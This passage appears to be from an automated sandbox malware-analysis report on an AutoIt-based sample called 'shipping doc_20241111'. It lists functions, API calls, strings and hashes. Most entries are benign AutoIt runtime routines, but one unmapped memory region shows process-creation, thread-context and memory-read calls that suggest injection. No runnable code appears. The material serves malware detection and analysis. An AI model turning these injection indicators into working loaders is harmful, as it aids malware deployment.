InitCommonControlsEx.COMCTL32(?), ref: 00F4478A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F4479A
LoadIconW.USER32(000000A9), ref: 00F447B0
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F447BF

Strings

TaskbarCreated, xrefs: 00F44762
+, xrefs: 00F4471B
0, xrefs: 00F44714
AutoIt v3 GUI, xrefs: 00F4474E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0ba2962fb3b2ca6a5fbcd22745b10f7b98eb77f7e696a2278706e0b6d179ade3
Instruction ID: 39900712ff3bbc820b9d508068152e0a06f9fe709f3a61bd3cb19de24c1e5664
Opcode Fuzzy Hash: 0ba2962fb3b2ca6a5fbcd22745b10f7b98eb77f7e696a2278706e0b6d179ade3
Instruction Fuzzy Hash: 0D21F7B190230DAFDB10DFA4E849BDDBBBAFB08701F00811AF661A6294D7B94544DF91

Function 00F805FC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F8033B: CreateFileW.KERNELBASE(00000000,00000000,?,00F806A5,?,?,00000000,?,00F806A5,00000000,0000000C), ref: 00F80358

GetLastError.KERNEL32 ref: 00F80710
__dosmaperr.LIBCMT ref: 00F80717
GetFileType.KERNELBASE(00000000), ref: 00F80723
GetLastError.KERNEL32 ref: 00F8072D
__dosmaperr.LIBCMT ref: 00F80736
CloseHandle.KERNEL32(00000000), ref: 00F80756
CloseHandle.KERNEL32(?), ref: 00F808A0
GetLastError.KERNEL32 ref: 00F808D2
__dosmaperr.LIBCMT ref: 00F808D9

Strings

H, xrefs: 00F8085E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ca061df3b2d047e314cf15369879f8a3594b18d104824c1e2f6e61c994d27fa0
Instruction ID: 3f1b15f6311e4ff5ceef74f23e48c3fb81fa1869bdc0c06ee505878de5647049
Opcode Fuzzy Hash: ca061df3b2d047e314cf15369879f8a3594b18d104824c1e2f6e61c994d27fa0
Instruction Fuzzy Hash: 02A14632A041089FDF18AF78DC52BED3BA1AB06320F14015EF8559B3D1DB399D1AEB91

Function 00F4533E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F458E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01011418,?,00F448AA,?,?,?,00000000), ref: 00F45903

Part of subcall function 00F44D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F44DA4

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F4545B
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F83EEC
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F83F2D
RegCloseKey.ADVAPI32(?), ref: 00F83F6F
_wcslen.LIBCMT ref: 00F83FD6
_wcslen.LIBCMT ref: 00F83FE5

Strings

Include, xrefs: 00F83EE3, 00F83F24
Software\AutoIt v3\AutoIt, xrefs: 00F45451
\, xrefs: 00F83FEB
\Include\, xrefs: 00F45418

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: b6119ae230c10055ac77a83e4c24817ad1d8a025b06ff1c0fa3fda1caa307217
Instruction ID: 77eb285865898d8ee611b4841e01c3655834dac967f5f2683c6dc6737c457224
Opcode Fuzzy Hash: b6119ae230c10055ac77a83e4c24817ad1d8a025b06ff1c0fa3fda1caa307217
Instruction Fuzzy Hash: A471E0714083019EC314EF69DC8189BBBF8FF85750F50842EF984D71A5EB799A48EB92

Function 00F445AE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F445B9
LoadCursorW.USER32(00000000,00007F00), ref: 00F445C8
LoadIconW.USER32(00000063), ref: 00F445DE
LoadIconW.USER32(000000A4), ref: 00F445F0
LoadIconW.USER32(000000A2), ref: 00F44602
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F4461A
RegisterClassExW.USER32(?), ref: 00F4466B

Part of subcall function 00F446FF: GetSysColorBrush.USER32(0000000F), ref: 00F44732
Part of subcall function 00F446FF: RegisterClassExW.USER32(00000030), ref: 00F4475C
Part of subcall function 00F446FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F4476D
Part of subcall function 00F446FF: InitCommonControlsEx.COMCTL32(?), ref: 00F4478A
Part of subcall function 00F446FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F4479A
Part of subcall function 00F446FF: LoadIconW.USER32(000000A9), ref: 00F447B0
Part of subcall function 00F446FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F447BF

Strings

0, xrefs: 00F4463A
#, xrefs: 00F44641
AutoIt v3, xrefs: 00F4465A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 788b30fc207be89009d0768ebb8612861491ae1cb436e90cc31e687a7b2de161
Instruction ID: a7aae5dd1a34d7e5a0c957b4582a812e7d176f9e5a14470c353a68cf468233f6
Opcode Fuzzy Hash: 788b30fc207be89009d0768ebb8612861491ae1cb436e90cc31e687a7b2de161
Instruction Fuzzy Hash: A9214C74E02318ABDB249FB5EC45B99BFB6FB48B50F00801BE640A6698D7BE1500DF90

Function 00F44B9B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F44B95,?,?), ref: 00F44C03
KillTimer.USER32(?,00000001,?,?,?,?,?,00F44B95,?,?), ref: 00F44C2F
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F44C52
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F44B95,?,?), ref: 00F44C5D
CreatePopupMenu.USER32 ref: 00F44C71
PostQuitMessage.USER32(00000000), ref: 00F44C92

Strings

TaskbarCreated, xrefs: 00F44C58

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4e82ec178229e927419f8d06a3521e29c2ea3503523f31f191bf8f99dde54fac
Instruction ID: 0a111fa606f71c3945e7d4c46af77694335c62d01475f56b7ec3dc66035f1495
Opcode Fuzzy Hash: 4e82ec178229e927419f8d06a3521e29c2ea3503523f31f191bf8f99dde54fac
Instruction Fuzzy Hash: E4415832604108ABDB2C2B38DD8ABB83E16E740758F184115FF92E61D4DB7EE940F761

Function 015AA958 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015AAA29
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015AAC4F

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: f7afbf4bbfe6d4aa08945ea547ec8a72db5218c607f8dd58336319904a19fe9d
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 9BA11770E40209EBEB14DFA8C994BEEBBB6FF48304F608559E211BB280D7759A44CB54

Function 00F4468E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F446BC
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F446DD
ShowWindow.USER32(00000000,?,?,?,?,?,?,00F436D8,?), ref: 00F446F1
ShowWindow.USER32(00000000,?,?,?,?,?,?,00F436D8,?), ref: 00F446FA

Strings

AutoIt v3, xrefs: 00F446B4, 00F446B9, 00F446BA
edit, xrefs: 00F446D7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2b54e681a5751b5833265fce40a713392d857ca60c5f1b62671a4c9a387bd4aa
Instruction ID: b21eadf7f2a12504e73b0b0cf4c97673eb331ceb7630312904ab27adf2d70ebd
Opcode Fuzzy Hash: 2b54e681a5751b5833265fce40a713392d857ca60c5f1b62671a4c9a387bd4aa
Instruction Fuzzy Hash: 1AF03A755403947AEB3007336C08E777FBED7CAF50B00811AFA40A2258C67A0840EBB0

Function 015AA6F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 015AA5E8: Sleep.KERNELBASE(000001F4), ref: 015AA5F9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015AA848

Strings

5JJLTH0X533F53KRZOKWLC792RMCQU, xrefs: 015AA8AB, 015AA8AE

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: CreateFileSleep
String ID: 5JJLTH0X533F53KRZOKWLC792RMCQU
API String ID: 2694422964-2533915272
Opcode ID: f37b98390b8de075bfe26891bbb7b11dd909f1b113869c669a3dc5f96ed52f4d
Instruction ID: 9867d2476e281badd79a13d25b3e6f42cc2cf51f2a2a27a53d15108d0cc82fde
Opcode Fuzzy Hash: f37b98390b8de075bfe26891bbb7b11dd909f1b113869c669a3dc5f96ed52f4d
Instruction Fuzzy Hash: 36619730D0828DDAEF11D7B8C854BEEBBB4AF19304F444599E2487B2C1D7B91B49CBA5

Function 00F459A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F4599A,SwapMouseButtons,00000004,?), ref: 00F459CB
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F4599A,SwapMouseButtons,00000004,?), ref: 00F459EC
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F4599A,SwapMouseButtons,00000004,?), ref: 00F45A0E

Strings

Control Panel\Mouse, xrefs: 00F459C9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6e71fb3956fdd41dde85431011ff2d3df137c1ed0398809d9dcc09cda0158902
Instruction ID: b447e59307fa8951f63b6f07662ae0c239d170ce37f10dbcd57426081758cdf0
Opcode Fuzzy Hash: 6e71fb3956fdd41dde85431011ff2d3df137c1ed0398809d9dcc09cda0158902
Instruction Fuzzy Hash: D9115A71521609FFDF209F64DC85AAEBBB8EF00B50B108619F801E7210E2359E44EBA0

Function 015A95E8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 015A9DA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015A9E39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015A9E5B

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction ID: befa8b97de674fd1c8e6858ece254a7ba122ce30bb3ec4728f14e95e31433a02
Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction Fuzzy Hash: 06620C30A542189BEB24CFA4C850BDEB776FF58300F5091A9D20DEB394E7799E81CB59

Function 00F457AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F840D9

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F4588F

Strings

Line: , xrefs: 00F84122

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 3ffd90b423074c6e589b0eefa78c4d1aafd93978a5e1290e0b690363ad011138
Instruction ID: 7d85555429d45b69713b47ee9cde0badd7502bb35a71b8c887db0403a8d8d8dd
Opcode Fuzzy Hash: 3ffd90b423074c6e589b0eefa78c4d1aafd93978a5e1290e0b690363ad011138
Instruction Fuzzy Hash: 6831D471409305ABD724FB20DC45BDB7BD8AF50B20F00852EFA9983092EF789A44DBD2

Function 00F5FD5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00F605E8

Part of subcall function 00F63234: RaiseException.KERNEL32(?,?,?,00F6060A,?,00000001,?,?,?,?,?,?,00F6060A,?,01008748), ref: 00F63294

__CxxThrowException@8.LIBVCRUNTIME ref: 00F60605

Strings

Unknown exception, xrefs: 00F60612

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 76cf8b2b38573446f1c572ebb552ae7dca34406916cf61ea87ba91f348060d7f
Instruction ID: d937421f9fd8952cda1c29403141f3de9fa9ffb9d10de2d97d7b786c4015bb93
Opcode Fuzzy Hash: 76cf8b2b38573446f1c572ebb552ae7dca34406916cf61ea87ba91f348060d7f
Instruction Fuzzy Hash: C5F0C224D0020C778B00B668EC46D9E777C6E00320B7485B5B92596496EF76EE1AAA80

Function 00FC7E80 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FC821C
TerminateProcess.KERNEL32(00000000), ref: 00FC8223
FreeLibrary.KERNEL32(?,?,?,?), ref: 00FC8404

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 06e394d2f178233c4de784aa6a6fdf7e8e3da8caefb64f6b8b5be17563ac1316
Instruction ID: 2119e7aeeb514ad3e1a3dafcb77e3be477cafd232625dc34a0793a52b85d627d
Opcode Fuzzy Hash: 06e394d2f178233c4de784aa6a6fdf7e8e3da8caefb64f6b8b5be17563ac1316
Instruction Fuzzy Hash: 71128E71A083429FC714DF28C585B6ABBE1FF84364F04895DE8898B252DB34ED46DF92

Function 00F429FE Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F434CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F434FF
Part of subcall function 00F434CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F43507
Part of subcall function 00F434CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F43512
Part of subcall function 00F434CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F4351D
Part of subcall function 00F434CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F43525
Part of subcall function 00F434CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4352D

Part of subcall function 00F43455: RegisterWindowMessageW.USER32(00000004,?,00F42BCF), ref: 00F434AD

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F42C75
OleInitialize.OLE32 ref: 00F42C93
CloseHandle.KERNEL32(00000000,00000000), ref: 00F83037

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: a1783ff39128f74abd401676966750b4f1ed8fa7a2027fe795e6c7451f0f8633
Instruction ID: 088227cd9a5b69176d016393a009b9ba0672060cc85d03a891f008f2f5817932
Opcode Fuzzy Hash: a1783ff39128f74abd401676966750b4f1ed8fa7a2027fe795e6c7451f0f8633
Instruction Fuzzy Hash: 0871CDB4911201CFC7ACDF79E9456553FE2BB49344358822AEB9AC7349EB3E4501DF84

Function 00F7864E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00F7856C,?,01008CD8,0000000C), ref: 00F786A4
GetLastError.KERNEL32(?,00F7856C,?,01008CD8,0000000C), ref: 00F786AE
__dosmaperr.LIBCMT ref: 00F786D9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: e6b27ebf51a487247dce777a6984a3dc2f912c33e3f31362c26d3b409ba9d078
Instruction ID: 7f87c3b1c24998a13041648855289fcba844d790df639904daba1c2fdb496b53
Opcode Fuzzy Hash: e6b27ebf51a487247dce777a6984a3dc2f912c33e3f31362c26d3b409ba9d078
Instruction Fuzzy Hash: B1016F33E442503AE26422349C4DB3D37464B82BB4F39811BF90C8B1D2DDA48C82F583

Function 00F52C10 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00F530F6

Strings

CALL, xrefs: 00F530C6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: b4808127b39b95ce3f261cf9167d1445f1c3001e7ee837b8f0ee998320be81f1
Instruction ID: 88096f276bb989525491b627b9adef79aaf3cf63fdea7e2c9074e2557b4ce099
Opcode Fuzzy Hash: b4808127b39b95ce3f261cf9167d1445f1c3001e7ee837b8f0ee998320be81f1
Instruction Fuzzy Hash: AA22AD706083019FD714DF14C881B2ABBF1BF85315F14895DFA868B2A2D775E949EB82

Function 00F4480E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00F8386E

Part of subcall function 00F4592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F45922,?,?,00F448AA,?,?,?,00000000), ref: 00F4594D

Part of subcall function 00F447D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F447EF

Strings

X, xrefs: 00F8383C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
